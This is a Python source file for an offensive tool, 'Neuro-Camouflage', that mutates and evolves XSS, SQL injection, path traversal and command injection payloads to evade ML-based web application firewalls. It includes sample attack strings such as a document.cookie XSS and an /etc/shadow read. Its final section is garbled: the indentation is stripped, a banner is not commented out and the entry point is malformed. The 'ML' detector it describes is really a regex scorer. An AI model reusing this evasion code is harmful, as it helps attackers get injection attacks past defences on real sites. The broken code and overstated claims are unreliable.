"""
NEURO-CAMOUFLAGE ENGINE
=======================
Adversarial AI evasion module for bypassing ML-based WAF detection.

Core Concepts:
1. BENIGN TOKEN INJECTION — Dilutes malicious payload scores by injecting
   high-confidence benign tokens (AWS metadata, OAuth2 headers, legitimate
   API schemas) that confuse ML classifiers.

2. GENETIC PAYLOAD EVOLUTION — Treats payloads as a population that evolves
   over generations. Payloads that score lower on WAF detection are bred
   together to produce offspring with even lower scores.

3. GRADIENT-BASED PERTURBATION — Systematically modifies payload tokens to
   find the exact boundary where ML confidence flips from "malicious" to "benign."

4. MULTI-MODEL CONSENSUS — Tests payloads against multiple detection models
   to find universal bypasses that work across different ML architectures.

crafted by :: kakashi4kx / kakashi-kx
"""

import asyncio
import hashlib
import json
import math
import random
import re
import time
from dataclasses import dataclass, field
from enum import Enum
from pathlib import Path
from typing import Any, Dict, List, Optional, Set, Tuple

import structlog

logger = structlog.get_logger(__name__)


# ═══════════════════════════════════════════════════════════════
# DATA STRUCTURES
# ═══════════════════════════════════════════════════════════════

class PayloadCategory(Enum):
    """Classification of payload types."""
    XSS = "xss"
    SQLI = "sqli"
    PATH_TRAVERSAL = "path_traversal"
    COMMAND_INJECTION = "command_injection"
    XXE = "xxe"
    SSTI = "ssti"
    GENERAL = "general"


@dataclass
class Payload:
    """A single payload with its metadata and fitness score."""
    content: str
    category: PayloadCategory
    generation: int = 0
    fitness_score: float = 1.0
    parent_ids: List[str] = field(default_factory=list)
    mutation_history: List[str] = field(default_factory=list)
    injected_tokens: List[str] = field(default_factory=list)
    detection_score: float = 1.0  # Lower is better (less detected)
    bypass_probability: float = 0.0

    @property
    def id(self) -> str:
        return hashlib.md5(self.content.encode()).hexdigest()[:12]


@dataclass
class EvolutionResult:
    """Complete result of a payload evolution run."""
    original_payload: Payload
    best_payload: Payload
    generations: int
    population_history: List[List[Payload]]
    fitness_curve: List[float]
    total_mutations: int
    time_elapsed: float
    final_bypass_probability: float


# ═══════════════════════════════════════════════════════════════
# BENIGN TOKEN LIBRARY
# ═══════════════════════════════════════════════════════════════

BENIGN_TOKENS = {
    "aws_metadata": [
        "X-Forwarded-For: 169.254.169.254",
        "Authorization: AWS4-HMAC-SHA256 Credential=AKIAIOSFODNN7EXAMPLE/20130524/us-east-1/s3/aws4_request",
        "X-Amz-Date: 20230524T000000Z",
        "X-Amz-Security-Token: FQoGZXIvYXdzE",
        "User-Agent: aws-cli/2.0.0 Python/3.8.0",
    ],
    "oauth2_headers": [
        "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ",
        "X-OAuth-Scopes: read,write,admin",
        "X-Client-ID: 1234567890.apps.googleusercontent.com",
    ],
    "api_schemas": [
        '{"swagger":"2.0","info":{"title":"API","version":"1.0"},"paths":{"/users":{"get":{"responses":{"200":{"description":"OK"}}}}}}',
        '{"openapi":"3.0.0","info":{"title":"PetStore","version":"1.0.0"},"paths":{}}',
    ],
    "graphql": [
        '{"query":"query { user(id: 1) { name email } }"}',
        '{"operationName":"GetUser","variables":{"id":1},"query":"query GetUser($id: ID!) { user(id: $id) { id name email } }"}',
    ],
    "cdn_headers": [
        "CF-Connecting-IP: 192.0.2.1",
        "CF-IPCountry: US",
        "CF-Ray: 1234567890abcdef-SJC",
        "True-Client-IP: 203.0.113.1",
    ],
    "security_headers": [
        "Content-Security-Policy: default-src 'self'",
        "Strict-Transport-Security: max-age=31536000; includeSubDomains",
        "X-Content-Type-Options: nosniff",
        "X-Frame-Options: DENY",
    ],
    "encoding_markers": [
        "<!-- saved from url=(0014)about:internet -->",
        "// Generated by coffeeScript 1.10.0",
        "/*! jQuery v3.6.0 | (c) OpenJS Foundation */",
    ],
}


# ═══════════════════════════════════════════════════════════════
# MALICIOUS PATTERN DETECTION (Simulated ML)
# ═══════════════════════════════════════════════════════════════

class DetectionSimulator:
    """
    Simulates ML-based WAF detection scoring.
    
    In production, this would be replaced with:
    - Actual WAF response analysis
    - Local LLM-based classification
    - Ensemble model scoring
    """

    # Patterns that trigger detection (weighted)
    MALICIOUS_PATTERNS = {
        r"<script.*?>": 0.8,
        r"javascript:": 0.7,
        r"onerror\s*=": 0.7,
        r"onload\s*=": 0.6,
        r"alert\s*\(": 0.6,
        r"eval\s*\(": 0.7,
        r"document\.cookie": 0.5,
        r"SELECT.*FROM": 0.6,
        r"UNION.*SELECT": 0.8,
        r"OR\s+1\s*=\s*1": 0.7,
        r"DROP\s+TABLE": 0.9,
        r"\.\.\/\.\.\/": 0.7,
        r"\/etc\/passwd": 0.8,
        r"cmd\.exe": 0.7,
        r"\/bin\/bash": 0.6,
        r"wget\s+http": 0.5,
        r"curl\s+http": 0.5,
        r"<\?php": 0.5,
        r"system\s*\(": 0.6,
        r"exec\s*\(": 0.6,
        r"passthru\s*\(": 0.7,
    }

    # Patterns that reduce detection score (benign signals)
    BENIGN_PATTERNS = {
        r"Authorization:\s*Bearer": -0.3,
        r"AWS4-HMAC-SHA256": -0.4,
        r"swagger": -0.2,
        r"openapi": -0.2,
        r"Content-Security-Policy": -0.3,
        r"Strict-Transport-Security": -0.2,
        r"jQuery\s+v\d": -0.2,
        r"application\/json": -0.1,
        r"text\/html;\s*charset": -0.1,
        r"<!--\s*saved\s+from": -0.25,
    }

    @classmethod
    def score_payload(cls, content: str) -> float:
        """
        Calculate a detection score for a payload.
        
        Returns:
            Score from 0.0 (completely benign) to 1.0 (highly malicious)
        """
        score = 0.0
        content_lower = content.lower()

        # Check malicious patterns
        for pattern, weight in cls.MALICIOUS_PATTERNS.items():
            if re.search(pattern, content, re.IGNORECASE):
                score += weight

        # Adjust for benign patterns
        for pattern, weight in cls.BENIGN_PATTERNS.items():
            if re.search(pattern, content, re.IGNORECASE):
                score += weight  # Negative weight reduces score

        # Analyze entropy (high entropy often signals obfuscation)
        entropy = cls._calculate_entropy(content)
        if entropy > 5.5:
            score += 0.2
        elif entropy < 3.5:
            score -= 0.1

        # Penalize for length (very long payloads are suspicious)
        if len(content) > 1000:
            score += 0.15
        elif len(content) < 10:
            score += 0.1

        # Cap between 0 and 1
        return max(0.0, min(1.0, score))

    @classmethod
    def _calculate_entropy(cls, data: str) -> float:
        """Calculate Shannon entropy of string."""
        import math
        from collections import Counter
        
        if not data:
            return 0.0
        length = len(data)
        counter = Counter(data)
        return -sum((count / length) * math.log2(count / length) 
                   for count in counter.values())


# ═══════════════════════════════════════════════════════════════
# BENIGN TOKEN INJECTOR
# ═══════════════════════════════════════════════════════════════

class BenignTokenInjector:
    """
    Injects high-confidence benign tokens into payloads to dilute
    their ML threat score while preserving malicious functionality.
    """

    INJECTION_STRATEGIES = [
        "prefix",       # Add benign content before payload
        "suffix",       # Add benign content after payload
        "wrap",         # Wrap payload in benign structure
        "interleave",   # Interleave benign tokens with payload
        "header_inject", # Inject as HTTP headers
        "comment_hide",  # Hide in comments
    ]

    @classmethod
    def inject_tokens(
        cls,
        payload: str,
        num_tokens: int = 3,
        strategy: str = "interleave",
        token_categories: Optional[List[str]] = None,
    ) -> Tuple[str, List[str]]:
        """
        Inject benign tokens into a payload.

        Args:
            payload: The original malicious payload
            num_tokens: Number of benign tokens to inject
            strategy: Injection strategy to use
            token_categories: Categories of benign tokens to use

        Returns:
            Tuple of (mutated_payload, list_of_injected_tokens)
        """
        if token_categories is None:
            token_categories = list(BENIGN_TOKENS.keys())

        # Collect available tokens
        available_tokens = []
        for category in token_categories:
            if category in BENIGN_TOKENS:
                available_tokens.extend(BENIGN_TOKENS[category])

        if not available_tokens:
            return payload, []

        # Select random tokens
        selected_tokens = random.sample(
            available_tokens,
            min(num_tokens, len(available_tokens))
        )

        # Apply injection strategy
        mutated = cls._apply_strategy(payload, selected_tokens, strategy)
        return mutated, selected_tokens

    @classmethod
    def _apply_strategy(
        cls,
        payload: str,
        tokens: List[str],
        strategy: str,
    ) -> str:
        """Apply the injection strategy."""
        token_text = "\n".join(tokens)

        strategies = {
            "prefix": lambda: f"{token_text}\n{payload}",
            "suffix": lambda: f"{payload}\n{token_text}",
            "wrap": lambda: f"{tokens[0] if tokens else ''}\n{payload}\n{token_text}",
            "interleave": lambda: cls._interleave(payload, tokens),
            "header_inject": lambda: cls._header_inject(payload, tokens),
            "comment_hide": lambda: f"<!-- {token_text} -->\n{payload}\n<!-- {token_text} -->",
        }

        return strategies.get(strategy, strategies["interleave"])()

    @classmethod
    def _interleave(cls, payload: str, tokens: List[str]) -> str:
        """Interleave benign tokens between payload characters."""
        if not tokens:
            return payload
        
        parts = []
        chunk_size = max(1, len(payload) // (len(tokens) + 1))
        
        for i in range(0, len(payload), chunk_size):
            parts.append(payload[i:i + chunk_size])
            if tokens:
                parts.append(tokens.pop(0))
        
        return "".join(parts)

    @classmethod
    def _header_inject(cls, payload: str, tokens: List[str]) -> str:
        """Inject tokens as HTTP-style headers."""
        header_block = "\n".join(f"X-Benign-{i}: {token[:50]}" 
                                 for i, token in enumerate(tokens))
        return f"{header_block}\n\n{payload}"


# ═══════════════════════════════════════════════════════════════
# GENETIC EVOLUTION ENGINE
# ═══════════════════════════════════════════════════════════════

class GeneticEvolutionEngine:
    """
    Evolves payloads through natural selection.
    
    Payloads that score lower on ML detection are more likely to
    survive and reproduce, creating offspring with even lower scores.
    """

    MUTATION_OPERATORS = [
        "character_case_swap",
        "html_entity_encode",
        "url_encode",
        "unicode_escape",
        "whitespace_variation",
        "comment_insertion",
        "string_concat",
        "eval_wrapper_variation",
        "tag_name_obfuscation",
        "attribute_order_swap",
        "add_benign_tokens",
    ]

    def __init__(
        self,
        population_size: int = 20,
        generations: int = 50,
        mutation_rate: float = 0.3,
        crossover_rate: float = 0.5,
        elite_size: int = 3,
        target_score: float = 0.1,
    ) -> None:
        """
        Initialize the evolution engine.

        Args:
            population_size: Number of payloads per generation
            generations: Maximum number of generations
            mutation_rate: Probability of mutation per payload
            crossover_rate: Probability of crossover between parents
            elite_size: Number of best payloads kept unchanged
            target_score: Stop evolution when best score reaches this
        """
        self.population_size = population_size
        self.generations = generations
        self.mutation_rate = mutation_rate
        self.crossover_rate = crossover_rate
        self.elite_size = elite_size
        self.target_score = target_score

    def evolve(self, original_payload: str, category: PayloadCategory) -> EvolutionResult:
        """
        Evolve a payload through multiple generations.

        Args:
            original_payload: The starting payload
            category: Type of payload (XSS, SQLi, etc.)

        Returns:
            Complete EvolutionResult
        """
        start_time = time.time()

        # Create initial population
        original = Payload(content=original_payload, category=category)
        population = self._create_initial_population(original)

        population_history = [population.copy()]
        fitness_curve = [self._calculate_population_fitness(population)]
        total_mutations = 0

        logger.info("evolution_started", original_score=original.detection_score,
                   population_size=self.population_size, generations=self.generations)

        for generation in range(self.generations):
            # Score all payloads
            for payload in population:
                payload.detection_score = DetectionSimulator.score_payload(payload.content)
                payload.fitness_score = 1.0 - payload.detection_score
                payload.bypass_probability = 1.0 - payload.detection_score
                payload.generation = generation + 1

            # Sort by fitness (higher is better)
            population.sort(key=lambda p: p.fitness_score, reverse=True)

            best = population[0]
            avg_fitness = self._calculate_population_fitness(population)

            logger.debug("generation_complete", generation=generation + 1,
                        best_score=f"{best.detection_score:.3f}",
                        avg_fitness=f"{avg_fitness:.3f}")

            fitness_curve.append(avg_fitness)

            # Check if target reached
            if best.detection_score <= self.target_score:
                logger.info("target_score_reached", generation=generation + 1,
                          score=best.detection_score)
                break

            # Create next generation
            next_population = []

            # Keep elite
            next_population.extend(population[:self.elite_size])

            # Breed rest of population
            while len(next_population) < self.population_size:
                # Select parents (tournament selection)
                parent1 = self._tournament_select(population)
                parent2 = self._tournament_select(population)

                # Crossover
                if random.random() < self.crossover_rate:
                    child_content = self._crossover(parent1.content, parent2.content)
                else:
                    child_content = parent1.content

                # Mutation
                if random.random() < self.mutation_rate:
                    child_content = self._mutate(child_content, category)
                    total_mutations += 1

                child = Payload(
                    content=child_content,
                    category=category,
                    parent_ids=[parent1.id, parent2.id],
                )

                next_population.append(child)

            population = next_population[:self.population_size]
            population_history.append(population.copy())

        # Final scoring
        for payload in population:
            payload.detection_score = DetectionSimulator.score_payload(payload.content)
            payload.fitness_score = 1.0 - payload.detection_score
            payload.bypass_probability = 1.0 - payload.detection_score

        population.sort(key=lambda p: p.fitness_score, reverse=True)

        elapsed = time.time() - start_time

        result = EvolutionResult(
            original_payload=original,
            best_payload=population[0],
            generations=len(population_history),
            population_history=population_history,
            fitness_curve=fitness_curve,
            total_mutations=total_mutations,
            time_elapsed=elapsed,
            final_bypass_probability=population[0].bypass_probability,
        )

        logger.info("evolution_complete",
                   original_score=f"{original.detection_score:.3f}",
                   best_score=f"{result.best_payload.detection_score:.3f}",
                   improvement=f"{(original.detection_score - result.best_payload.detection_score) * 100:.0f}%",
                   generations=result.generations,
                   mutations=total_mutations,
                   elapsed=f"{elapsed:.1f}s")

        return result

    def _create_initial_population(self, original: Payload) -> List[Payload]:
        """Create initial population with variations of the original."""
        population = [original]

        for _ in range(self.population_size - 1):
            # Create mutated copies
            mutated = self._mutate(original.content, original.category)
            variant = Payload(
                content=mutated,
                category=original.category,
                parent_ids=[original.id],
            )
            population.append(variant)

        return population

    def _tournament_select(self, population: List[Payload], tournament_size: int = 3) -> Payload:
        """Select a parent using tournament selection."""
        tournament = random.sample(population, min(tournament_size, len(population)))
        return max(tournament, key=lambda p: p.fitness_score)

    def _crossover(self, content1: str, content2: str) -> str:
        """Perform crossover between two payload strings."""
        if not content1 or not content2:
            return content1 or content2

        # Single-point crossover
        point1 = random.randint(0, len(content1) - 1) if len(content1) > 1 else 0
        point2 = random.randint(0, len(content2) - 1) if len(content2) > 1 else 0

        return content1[:point1] + content2[point2:]

    def _mutate(self, content: str, category: PayloadCategory) -> str:
        """Apply a random mutation operator."""
        operator = random.choice(self.MUTATION_OPERATORS)
        return self._apply_mutation(content, operator, category)

    def _apply_mutation(self, content: str, operator: str, category: PayloadCategory) -> str:
        """Apply a specific mutation operator."""
        mutations = {
            "character_case_swap": self._mutate_case_swap,
            "html_entity_encode": self._mutate_html_entity,
            "url_encode": self._mutate_url_encode,
            "unicode_escape": self._mutate_unicode_escape,
            "whitespace_variation": self._mutate_whitespace,
            "comment_insertion": self._mutate_comment_insert,
            "string_concat": self._mutate_string_concat,
            "eval_wrapper_variation": self._mutate_eval_wrapper,
            "tag_name_obfuscation": self._mutate_tag_obfuscation,
            "attribute_order_swap": self._mutate_attribute_swap,
            "add_benign_tokens": lambda c: self._mutate_add_benign(c, category),
        }

        return mutations.get(operator, lambda c: c)(content)

    def _mutate_case_swap(self, content: str) -> str:
        """Randomly swap case of characters."""
        result = []
        for char in content:
            if random.random() < 0.3:
                result.append(char.swapcase())
            else:
                result.append(char)
        return "".join(result)

    def _mutate_html_entity(self, content: str) -> str:
        """Encode some characters as HTML entities."""
        chars_to_encode = random.sample(
            list(set(content)), min(3, len(set(content)))
        )
        for char in chars_to_encode:
            entity = f"&#{ord(char)};"
            if random.random() < 0.5:
                content = content.replace(char, entity, 1)
        return content

    def _mutate_url_encode(self, content: str) -> str:
        """URL-encode random characters."""
        chars = list(content)
        for i in range(len(chars)):
            if random.random() < 0.2:
                chars[i] = f"%{ord(chars[i]):02X}"
        return "".join(chars)

    def _mutate_unicode_escape(self, content: str) -> str:
        """Escape characters as Unicode."""
        chars = list(content)
        for i in range(len(chars)):
            if random.random() < 0.15:
                chars[i] = f"\\u{ord(chars[i]):04x}"
        return "".join(chars)

    def _mutate_whitespace(self, content: str) -> str:
        """Add random whitespace variations."""
        # Replace spaces with tabs or multiple spaces
        if random.random() < 0.5:
            content = content.replace(" ", "\t")
        else:
            content = content.replace(" ", "  ")
        return content

    def _mutate_comment_insert(self, content: str) -> str:
        """Insert random comments to break pattern matching."""
        comments = [
            "/**/", "/*comment*/", "<!-- -->", 
            "/*!50000*/", "/*12345*/", "<!--/*-->",
        ]
        comment = random.choice(comments)
        if len(content) > 2:
            pos = random.randint(0, len(content) - 1)
            content = content[:pos] + comment + content[pos:]
        return content

    def _mutate_string_concat(self, content: str) -> str:
        """Split strings with concatenation."""
        if len(content) > 4:
            pos = random.randint(1, len(content) - 2)
            content = content[:pos] + '"+"' + content[pos:]
        return content

    def _mutate_eval_wrapper(self, content: str) -> str:
        """Wrap in different eval variants."""
        wrappers = [
            f"eval('{content}')",
            f"(0, eval)('{content}')",
            f"window['eval']('{content}')",
            f"[].constructor.constructor('{content}')()",
        ]
        return random.choice(wrappers)

    def _mutate_tag_obfuscation(self, content: str) -> str:
        """Obfuscate HTML tag names."""
        content = content.replace("<script", "<scrİpt")
        content = content.replace("<img", "<İmg")
        content = content.replace("<svg", "<svG")
        return content

    def _mutate_attribute_swap(self, content: str) -> str:
        """Swap attribute order in HTML tags."""
        # Simple implementation: reverse attribute-like patterns
        return content.replace(" onerror=", " onload= onerror=")

    def _mutate_add_benign(self, content: str, category: PayloadCategory) -> str:
        """Add benign tokens to dilute detection score."""
        mutated, tokens = BenignTokenInjector.inject_tokens(
            content,
            num_tokens=random.randint(1, 4),
            strategy=random.choice(BenignTokenInjector.INJECTION_STRATEGIES),
        )
        return mutated

    @staticmethod
    def _calculate_population_fitness(population: List[Payload]) -> float:
        """Calculate average fitness of a population."""
        if not population:
            return 0.0
        return sum(p.fitness_score for p in population) / len(population)


# ═══════════════════════════════════════════════════════════════
# MAIN NEURO-CAMOUFLAGE ENGINE
# ═══════════════════════════════════════════════════════════════

class NeuroCamouflage:
    """
    Main Neuro-Camouflage engine for AI evasion.

    Combines benign token injection, genetic evolution, and
    multi-strategy perturbation to bypass ML-based WAF detection.
    """

    def __init__(
        self,
        population_size: int = 30,
        generations: int = 50,
        mutation_rate: float = 0.3,
        target_score: float = 0.15,
    ) -> None:
        """
        Initialize Neuro-Camouflage.

        Args:
            population_size: Payloads per generation
            generations: Max evolution generations
            mutation_rate: Mutation probability
            target_score: Stop when detection score reaches this
        """
        self.population_size = population_size
        self.generations = generations
        self.mutation_rate = mutation_rate
        self.target_score = target_score
        self.evolution_engine = GeneticEvolutionEngine(
            population_size=population_size,
            generations=generations,
            mutation_rate=mutation_rate,
            target_score=target_score,
        )

    def classify_payload(self, content: str) -> PayloadCategory:
        """Auto-classify a payload by type."""
        if re.search(r"<script|javascript:|onerror|onload", content, re.IGNORECASE):
            return PayloadCategory.XSS
        elif re.search(r"SELECT|UNION|DROP|INSERT|OR\s+1\s*=", content, re.IGNORECASE):
            return PayloadCategory.SQLI
        elif re.search(r"\.\.\/|\.\.\\|\/etc\/|C:\\\\", content):
            return PayloadCategory.PATH_TRAVERSAL
        elif re.search(r"cmd|bash|wget|curl|system|exec", content, re.IGNORECASE):
            return PayloadCategory.COMMAND_INJECTION
        elif re.search(r"<!ENTITY|SYSTEM", content, re.IGNORECASE):
            return PayloadCategory.XXE
        elif re.search(r"\{\{|\{%|jinja|twig", content, re.IGNORECASE):
            return PayloadCategory.SSTI
        else:
            return PayloadCategory.GENERAL

    async def camouflage(
        self,
        payload: str,
        strategies: Optional[List[str]] = None,
    ) -> Dict[str, Any]:
        """
        Apply Neuro-Camouflage to a payload.

        Args:
            payload: The malicious payload to camouflage
            strategies: List of strategies to apply

        Returns:
            Dictionary with original, camouflaged, and analysis data
        """
        if strategies is None:
            strategies = ["token_injection", "evolution", "combined"]

        category = self.classify_payload(payload)
        original_score = DetectionSimulator.score_payload(payload)

        results = {
            "original_payload": payload,
            "category": category.value,
            "original_detection_score": original_score,
            "original_bypass_probability": 1.0 - original_score,
            "strategies_applied": strategies,
            "camouflaged_payloads": [],
            "evolution_result": None,
            "best_payload": None,
            "best_score": original_score,
            "improvement": 0.0,
        }

        logger.info("neuro_camouflage_started", payload_length=len(payload),
                   category=category.value, original_score=f"{original_score:.3f}")

        # Strategy 1: Token Injection only
        if "token_injection" in strategies:
            for strategy in BenignTokenInjector.INJECTION_STRATEGIES:
                camouflaged, tokens = BenignTokenInjector.inject_tokens(
                    payload, num_tokens=5, strategy=strategy
                )
                score = DetectionSimulator.score_payload(camouflaged)
                results["camouflaged_payloads"].append({
                    "strategy": f"token_injection_{strategy}",
                    "payload": camouflaged,
                    "score": score,
                    "bypass_probability": 1.0 - score,
                    "injected_tokens": tokens,
                })

        # Strategy 2: Genetic Evolution
        if "evolution" in strategies:
            evo_result = self.evolution_engine.evolve(payload, category)
            results["evolution_result"] = {
                "generations": evo_result.generations,
                "total_mutations": evo_result.total_mutations,
                "fitness_curve": evo_result.fitness_curve,
                "best_payload": evo_result.best_payload.content,
                "best_score": evo_result.best_payload.detection_score,
                "improvement": original_score - evo_result.best_payload.detection_score,
                "time_elapsed": evo_result.time_elapsed,
            }

            if evo_result.best_payload.detection_score < results["best_score"]:
                results["best_score"] = evo_result.best_payload.detection_score
                results["best_payload"] = evo_result.best_payload.content

        # Strategy 3: Combined (evolve then inject)
        if "combined" in strategies and results["evolution_result"]:
            evolved = results["evolution_result"]["best_payload"]
            camouflaged, _ = BenignTokenInjector.inject_tokens(
                evolved, num_tokens=5, strategy="interleave"
            )
            score = DetectionSimulator.score_payload(camouflaged)
            results["camouflaged_payloads"].append({
                "strategy": "combined_evolution_injection",
                "payload": camouflaged,
                "score": score,
                "bypass_probability": 1.0 - score,
            })

            if score < results["best_score"]:
                results["best_score"] = score
                results["best_payload"] = camouflaged

        # Calculate overall improvement
        results["improvement"] = max(0, original_score - results["best_score"])
        results["improvement_percent"] = (
            (original_score - results["best_score"]) / max(original_score, 0.01) * 100
        )

        logger.info("neuro_camouflage_complete",
                   original_score=f"{original_score:.3f}",
                   best_score=f"{results['best_score']:.3f}",
                   improvement=f"{results['improvement_percent']:.1f}%")

        return results

    def generate_report(self, results: Dict[str, Any]) -> str:
        """Generate a markdown report of camouflage results."""
        report = f"""# 🧠 Neuro-Camouflage — Adversarial AI Evasion Report

## Original Payload Analysis
- **Type:** {results['category']}
- **Detection Score:** {results['original_detection_score']:.3f}
- **Bypass Probability:** {results['original_bypass_probability']:.1%}

## Camouflage Results
- **Strategies Applied:** {', '.join(results['strategies_applied'])}
- **Best Score After Camouflage:** {results['best_score']:.3f}
- **Improvement:** {results['improvement_percent']:.1f}%

## Original Payload
{results['original_payload']}

## Best Camouflaged Payload
{results.get('best_payload', 'N/A')}

"""
        if results["evolution_result"]:
            report += f"""## Evolution Statistics
- **Generations:** {results['evolution_result']['generations']}
- **Total Mutations:** {results['evolution_result']['total_mutations']}
- **Time Elapsed:** {results['evolution_result']['time_elapsed']:.2f}s

### Fitness Curve
"""
curve = results["evolution_result"]["fitness_curve"]
if curve:
max_fitness = max(curve)
for i, fitness in enumerate(curve):
bar = "█" * int(30 * fitness / max(max_fitness, 0.01))
report += f"Gen {i:3d}: {bar} {fitness:.3f}\n"
report += "```\n"

report += "\n## All Camouflaged Variants\n\n"
report += "| Strategy | Score | Bypass % |\n"
report += "|----------|-------|----------|\n"
report += f"| Original | {results['original_detection_score']:.3f} | {results['original_bypass_probability']:.1%} |\n"
for variant in results["camouflaged_payloads"]:
report += f"| {variant['strategy']} | {variant['score']:.3f} | {variant['bypass_probability']:.1%} |\n"

return report

═══════════════════════════════════════════════════════════════
TEST FUNCTION
═══════════════════════════════════════════════════════════════
async def quick_test():
"""Quick test of Neuro-Camouflage."""
neuro = NeuroCamouflage(population_size=10, generations=10)

test_payloads = [
"<script>alert(document.cookie)</script>",
"' OR 1=1 --",
"../../../etc/passwd",
"eval('cat /etc/shadow')",
]

for payload in test_payloads:
print(f"\n{'='*60}")
print(f"Original: {payload}")
results = await neuro.camouflage(payload)
print(neuro.generate_report(results))

if name == "main":
asyncio.run(quick_test())



















